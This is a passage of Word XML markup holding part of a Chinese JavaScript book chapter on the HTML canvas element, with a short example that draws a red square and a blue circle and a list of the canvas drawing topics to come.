      <w:r>
        <w:t>给指针添加阴影</w:t>
      </w:r>
      <w:r>
        <w:t>--</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>line id="hourhand"x1="50"y1="50"x2="50"y2="24"/</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>line id="minutehand"x1="50"y1="50"x2="50"y2="20"/</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>/g</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>/svg</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3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="530" w:name="21_4__canvas_Zhong_De_Tu_Xing_"/>
      <w:r>
        <w:t>21.4</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　＜</w:t>
      </w:r>
      <w:r>
        <w:t>canvas</w:t>
      </w:r>
      <w:r>
        <w:t>＞中的图形</w:t>
      </w:r>
      <w:bookmarkEnd w:id="530"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>canvas</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素自身是没有任何外观的，但是它在文档中创建了一个画板，同时还提供了很多强大的绘制客户端</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:t>。尽管</w:t>
      </w:r>
      <w:r>
        <w:t>canvas</w:t>
      </w:r>
      <w:r>
        <w:t>元素在</w:t>
      </w:r>
      <w:r>
        <w:t>HTML5</w:t>
      </w:r>
      <w:r>
        <w:t>中才标准</w:t>
      </w:r>
      <w:r>
        <w:t>化，但实际上它很早就存在了。＜</w:t>
      </w:r>
      <w:r>
        <w:t>canvas</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素最早是</w:t>
      </w:r>
      <w:r>
        <w:t>Apple</w:t>
      </w:r>
      <w:r>
        <w:t>在</w:t>
      </w:r>
      <w:r>
        <w:t>Safari 1.3</w:t>
      </w:r>
      <w:r>
        <w:t>中引入的，</w:t>
      </w:r>
      <w:r>
        <w:t>Firefox 1.5</w:t>
      </w:r>
      <w:r>
        <w:t>之后以及</w:t>
      </w:r>
      <w:r>
        <w:t>Opera 9</w:t>
      </w:r>
      <w:r>
        <w:t>之后的浏览器都已经支持它了。</w:t>
      </w:r>
      <w:r>
        <w:t>Chrome</w:t>
      </w:r>
      <w:r>
        <w:t>的所有版本也都支持它。不过</w:t>
      </w:r>
      <w:r>
        <w:t>IE9</w:t>
      </w:r>
      <w:r>
        <w:t>之前的浏览器不支持＜</w:t>
      </w:r>
      <w:r>
        <w:t>canvas</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素，但是可以使用开源的</w:t>
      </w:r>
      <w:r>
        <w:t>ExplorerCanvas</w:t>
      </w:r>
      <w:r>
        <w:t>项目（</w:t>
      </w:r>
      <w:r>
        <w:t>http://code.google.com/p/explorercanvas/</w:t>
      </w:r>
      <w:r>
        <w:t>）在</w:t>
      </w:r>
      <w:r>
        <w:t>IE6</w:t>
      </w:r>
      <w:r>
        <w:t>～</w:t>
      </w:r>
      <w:r>
        <w:t>8</w:t>
      </w:r>
      <w:r>
        <w:t>中模拟＜</w:t>
      </w:r>
      <w:r>
        <w:t>canvas</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>canvas</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素和</w:t>
      </w:r>
      <w:r>
        <w:t>SVG</w:t>
      </w:r>
      <w:r>
        <w:t>之间一个重要的区别是：使用</w:t>
      </w:r>
      <w:r>
        <w:t>canvas</w:t>
      </w:r>
      <w:r>
        <w:t>来绘制图形是通过调</w:t>
      </w:r>
      <w:r>
        <w:t>用它提供的方法而使用</w:t>
      </w:r>
      <w:r>
        <w:t>SVG</w:t>
      </w:r>
      <w:r>
        <w:t>绘制图形是通过构建一棵</w:t>
      </w:r>
      <w:r>
        <w:t>XML</w:t>
      </w:r>
      <w:r>
        <w:t>元素树来实现的。这两种方式都很强大：两者之间都可以互相模拟。但是，从表面上看，这两者还是不同的，并且各有优劣。比如：使用</w:t>
      </w:r>
      <w:r>
        <w:t>SVG</w:t>
      </w:r>
      <w:r>
        <w:t>来绘制图形，可以很简单地通过移除相应的元素来编辑图片。而使用＜</w:t>
      </w:r>
      <w:r>
        <w:t>canvas</w:t>
      </w:r>
      <w:r>
        <w:t>＞来绘制，要移除图片中的元素就不得不把当前的擦除再重新绘制一遍。</w:t>
      </w:r>
      <w:r>
        <w:t>Canvas</w:t>
      </w:r>
      <w:r>
        <w:t>的绘制</w:t>
      </w:r>
      <w:r>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:t>是基于</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>的，并且相对比较简洁（不像</w:t>
      </w:r>
      <w:r>
        <w:t>SVG</w:t>
      </w:r>
      <w:r>
        <w:t>语法那么复杂），因此本书对这些</w:t>
      </w:r>
      <w:r>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:t>都会做说明。参见第四部分中关于</w:t>
      </w:r>
      <w:r>
        <w:t>Canvas</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>CanvasRenderingC</w:t>
      </w:r>
      <w:r>
        <w:t>ontext2D</w:t>
      </w:r>
      <w:r>
        <w:t>和其他相关项的章节。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>大部分的画布绘制</w:t>
      </w:r>
      <w:r>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:t>都不是在＜</w:t>
      </w:r>
      <w:r>
        <w:t>canvas</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素自身上定义的，而是定义在一个</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>绘制上下文</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>对象上，获取该对象可以通过调用画布的</w:t>
      </w:r>
      <w:r>
        <w:t>getContext()</w:t>
      </w:r>
      <w:r>
        <w:t>方法。调用</w:t>
      </w:r>
      <w:r>
        <w:t>getContext()</w:t>
      </w:r>
      <w:r>
        <w:t>方法时，传递一个</w:t>
      </w:r>
      <w:r>
        <w:t>"2d"</w:t>
      </w:r>
      <w:r>
        <w:t>参数，会获得一个</w:t>
      </w:r>
      <w:r>
        <w:t>CanvasRenderingContext2D</w:t>
      </w:r>
      <w:r>
        <w:t>对象，使用该对象可以在画布上绘制二维图形。这里很重要的一点是要搞清楚，画布元素和它的上下文对象是两个完全不同的对象。由于</w:t>
      </w:r>
      <w:r>
        <w:t>CanvasRenderingContext2D</w:t>
      </w:r>
      <w:r>
        <w:t>名字太长了，因此这里做个约定，统</w:t>
      </w:r>
      <w:r>
        <w:t>一简称为</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>上下文对象</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>。同样地，</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>画布</w:t>
      </w:r>
      <w:r>
        <w:t>API”</w:t>
      </w:r>
      <w:r>
        <w:t>指的也就是</w:t>
      </w:r>
      <w:r>
        <w:t>CanvasRenderingContext2D</w:t>
      </w:r>
      <w:r>
        <w:t>对象的方法。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para07"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>画布中的</w:t>
      </w:r>
      <w:r>
        <w:t>3D</w:t>
      </w:r>
      <w:r>
        <w:t>图形</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para05"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>在撰写本书时，浏览器提供商正在开始实现＜</w:t>
      </w:r>
      <w:r>
        <w:t>canvas</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素用于绘制</w:t>
      </w:r>
      <w:r>
        <w:t>3D</w:t>
      </w:r>
      <w:r>
        <w:t>图形的</w:t>
      </w:r>
      <w:r>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:t>。这些</w:t>
      </w:r>
      <w:r>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:t>称为：</w:t>
      </w:r>
      <w:r>
        <w:t>"WebGL"</w:t>
      </w:r>
      <w:r>
        <w:t>，它是绑定到</w:t>
      </w:r>
      <w:r>
        <w:t>OpenGL</w:t>
      </w:r>
      <w:r>
        <w:t>标准</w:t>
      </w:r>
      <w:r>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:t>的一个</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>。将</w:t>
      </w:r>
      <w:r>
        <w:t>"webgl"</w:t>
      </w:r>
      <w:r>
        <w:t>字符串作为参数传递给画布的</w:t>
      </w:r>
      <w:r>
        <w:t>getContext()</w:t>
      </w:r>
      <w:r>
        <w:t>方法可以获得用于绘制</w:t>
      </w:r>
      <w:r>
        <w:t>3D</w:t>
      </w:r>
      <w:r>
        <w:t>图形的上下文对象。由于</w:t>
      </w:r>
      <w:r>
        <w:t>WebGL</w:t>
      </w:r>
      <w:r>
        <w:t>很庞大，而且也非常复杂，本书将不会介绍它的一些底层</w:t>
      </w:r>
      <w:r>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:t>：其实</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>开发者也更倾向于使用封装了</w:t>
      </w:r>
      <w:r>
        <w:t>WebGL</w:t>
      </w:r>
      <w:r>
        <w:t>底层</w:t>
      </w:r>
      <w:r>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:t>的工具类库而不喜欢直接使用</w:t>
      </w:r>
      <w:r>
        <w:t>WebGL API</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>如下代码是一个使用画布</w:t>
      </w:r>
      <w:r>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:t>的简单例子，它在＜</w:t>
      </w:r>
      <w:r>
        <w:t>can</w:t>
      </w:r>
      <w:r>
        <w:t>vas</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素中绘制一个红色的正方形和一个蓝色的圆，产生的输出和图</w:t>
      </w:r>
      <w:r>
        <w:t>21-2</w:t>
      </w:r>
      <w:r>
        <w:t>所示的</w:t>
      </w:r>
      <w:r>
        <w:t>SVG</w:t>
      </w:r>
      <w:r>
        <w:t>图形类似：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>body</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>This is a red square:</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>canvas id="square"width=10 height=10</w:t>
      </w:r>
      <w:r>
        <w:t>＞＜</w:t>
      </w:r>
      <w:r>
        <w:t>/canvas</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>This is a blue circle:</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>canvas id="circle"width=10 height=10</w:t>
      </w:r>
      <w:r>
        <w:t>＞＜</w:t>
      </w:r>
      <w:r>
        <w:t>/canvas</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>script</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">var </w:t>
      </w:r>
      <w:r>
        <w:t>canvas=document.getElementById("square");//</w:t>
      </w:r>
      <w:r>
        <w:t>获取第一个画布元素</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var context=canvas.getContext("2d");//</w:t>
      </w:r>
      <w:r>
        <w:t>获取</w:t>
      </w:r>
      <w:r>
        <w:t>2D</w:t>
      </w:r>
      <w:r>
        <w:t>绘制上下文</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>context.fillStyle="#f00";//</w:t>
      </w:r>
      <w:r>
        <w:t>设置填充色为红色</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>context.fillRect(0,0,10,10);//</w:t>
      </w:r>
      <w:r>
        <w:t>填充一个正方形</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>canvas=document.getElementById("circle");//</w:t>
      </w:r>
      <w:r>
        <w:t>第二个画布元素</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>context=canvas.getContext("2d"</w:t>
      </w:r>
      <w:r>
        <w:t>);//</w:t>
      </w:r>
      <w:r>
        <w:t>获取它的绘制上下文</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>context.beginPath();//</w:t>
      </w:r>
      <w:r>
        <w:t>开始一条新的路径</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>context.arc(5,5,5,0,2*Math.PI,true);//</w:t>
      </w:r>
      <w:r>
        <w:t>将圆形添加到该路径中</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>context.fillStyle="#00f";//</w:t>
      </w:r>
      <w:r>
        <w:t>设置填充色为蓝色</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>context.fill();//</w:t>
      </w:r>
      <w:r>
        <w:t>填充路径</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>/script</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>/body</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>之前我们看到</w:t>
      </w:r>
      <w:r>
        <w:t>SVG</w:t>
      </w:r>
      <w:r>
        <w:t>使用可以绘制或填充的线段和曲线这种路径来描述复杂的图形。画布</w:t>
      </w:r>
      <w:r>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:t>也采用</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>路径</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>的思想。然而不同的是，相比</w:t>
      </w:r>
      <w:r>
        <w:t>SVG</w:t>
      </w:r>
      <w:r>
        <w:t>使用一个包含了字母和数字的字符串来描述路</w:t>
      </w:r>
      <w:r>
        <w:t>径，画布</w:t>
      </w:r>
      <w:r>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:t>是通过一系列方法调用来定义路径的，如上述代码中的</w:t>
      </w:r>
      <w:r>
        <w:t>beginPath()</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>arc()</w:t>
      </w:r>
      <w:r>
        <w:t>方法调用。一旦定义了路径，其他的诸如</w:t>
      </w:r>
      <w:r>
        <w:t>fill()</w:t>
      </w:r>
      <w:r>
        <w:t>这样的方法就可以在该路径上操作了。而像</w:t>
      </w:r>
      <w:r>
        <w:t>fillStyle</w:t>
      </w:r>
      <w:r>
        <w:t>这样的上下文对象的属性则是指定了如何进行这些操作。接下来的内容将解释：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>·</w:t>
      </w:r>
      <w:r>
        <w:t>如何定义路径、如何绘制或者说勾勒路径的外边框以及如何填充路径的内部。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>·</w:t>
      </w:r>
      <w:r>
        <w:t>如何设置和获取画布上下文对象的属性以及如何保存和恢复这些属性的当前状态。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>·</w:t>
      </w:r>
      <w:r>
        <w:t>画布的大小、默认画布坐标系以及如何进行坐标变换。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>·</w:t>
      </w:r>
      <w:r>
        <w:t>画布</w:t>
      </w:r>
      <w:r>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:t>定义的大量的绘制曲线的方法。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>·</w:t>
      </w:r>
      <w:r>
        <w:t>一些用于绘制长方形的专用工具方法。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>·</w:t>
      </w:r>
      <w:r>
        <w:t>如何指定颜色、使用透明度以及如何绘制渐变色和重复的图案。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>·</w:t>
      </w:r>
      <w:r>
        <w:t>控制线条宽度以及顶点和端点外观的属性。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>·</w:t>
      </w:r>
      <w:r>
        <w:t>如何在＜</w:t>
      </w:r>
      <w:r>
        <w:t>canvas</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素中绘制文本。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>·</w:t>
      </w:r>
      <w:r>
        <w:t>如何</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>裁剪</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>图形以保证图形不超过指定区域。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>·</w:t>
      </w:r>
      <w:r>
        <w:t>如何给图形添加下拉阴影效果。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>·</w:t>
      </w:r>
      <w:r>
        <w:t>如何在画布中绘制（和选择性地伸缩）图形以及如何作为图片从画布中提取内容。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>·</w:t>
      </w:r>
      <w:r>
        <w:t>如何控制画布中新画（半透明）像素和原有像素的融合过程。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>·</w:t>
      </w:r>
      <w:r>
        <w:t>在画布中，如何设置和查询像素的红、绿、蓝色值以及</w:t>
      </w:r>
      <w:r>
        <w:t>alpha</w:t>
      </w:r>
      <w:r>
        <w:t>值（透明度）。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>·</w:t>
      </w:r>
      <w:r>
        <w:t>当在画布中绘制图形的时候，如何判定是否触发了鼠标事件。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>本节最后会展示一个实际示例，其使用＜</w:t>
      </w:r>
      <w:r>
        <w:t>canvas</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素绘制一个小的内联图表，一般称为</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>迷你图</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:t>sparkline</w:t>
      </w:r>
      <w:r>
        <w:t>）。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>下面大部分的＜</w:t>
      </w:r>
      <w:r>
        <w:t>canvas</w:t>
      </w:r>
      <w:r>
        <w:t>＞例子都使用到了变量</w:t>
      </w:r>
      <w:r>
        <w:t>c</w:t>
      </w:r>
      <w:r>
        <w:t>。该变量保存画布的</w:t>
      </w:r>
      <w:r>
        <w:t>CanvasRenderingContext2D</w:t>
      </w:r>
      <w:r>
        <w:t>对象，但是例子中并没有显示</w:t>
      </w:r>
      <w:r>
        <w:t>c</w:t>
      </w:r>
      <w:r>
        <w:t>是如何初始化的。要让这些例子能够正常运行，需要在</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>中定义个适当大小的画布，然后添加下面这段用于初始化变量</w:t>
      </w:r>
      <w:r>
        <w:t>c</w:t>
      </w:r>
      <w:r>
        <w:t>的代码：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var canvas=document.getElementById</w:t>
      </w:r>
      <w:r>
        <w:t>("my_canvas_id");</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var c=canvas.getContext('2d');</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
